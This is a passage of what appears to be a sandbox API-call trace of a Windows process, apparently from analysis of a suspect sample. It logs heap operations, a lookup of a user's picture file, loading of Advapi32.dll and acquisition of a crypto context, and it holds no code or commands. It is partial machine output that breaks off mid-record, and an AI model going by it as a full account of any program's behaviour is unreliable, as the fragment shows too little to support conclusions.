hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0250.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0250.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0250.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0250.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0250.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0250.920] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/NU6pYHrnfbris-w219Y.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6c49a0, ftCreationTime.dwHighDateTime=0x1d5e0c6, ftLastAccessTime.dwLowDateTime=0x5992d230, ftLastAccessTime.dwHighDateTime=0x1d5e4dc, ftLastWriteTime.dwLowDateTime=0x5992d230, ftLastWriteTime.dwHighDateTime=0x1d5e4dc, nFileSizeHigh=0x0, nFileSizeLow=0x11ef3, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="NU6pYHrnfbris-w219Y.png", cAlternateFileName="NU6PYH~1.PNG")) returned 0xa87290 [0250.920] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0250.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0250.922] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0250.922] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.922] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0250.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0250.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0250.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0250.923] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0250.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0250.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0250.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0250.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.923] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.924] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.924] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0250.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0250.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0250.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0250.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.925] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.925] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.925] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0250.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.926] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0250.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.927] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.927] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.927] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0250.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.927] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0250.927] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0250.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0250.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0250.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0250.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.928] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0250.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0250.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0250.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0250.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0250.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0250.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0250.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0250.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: 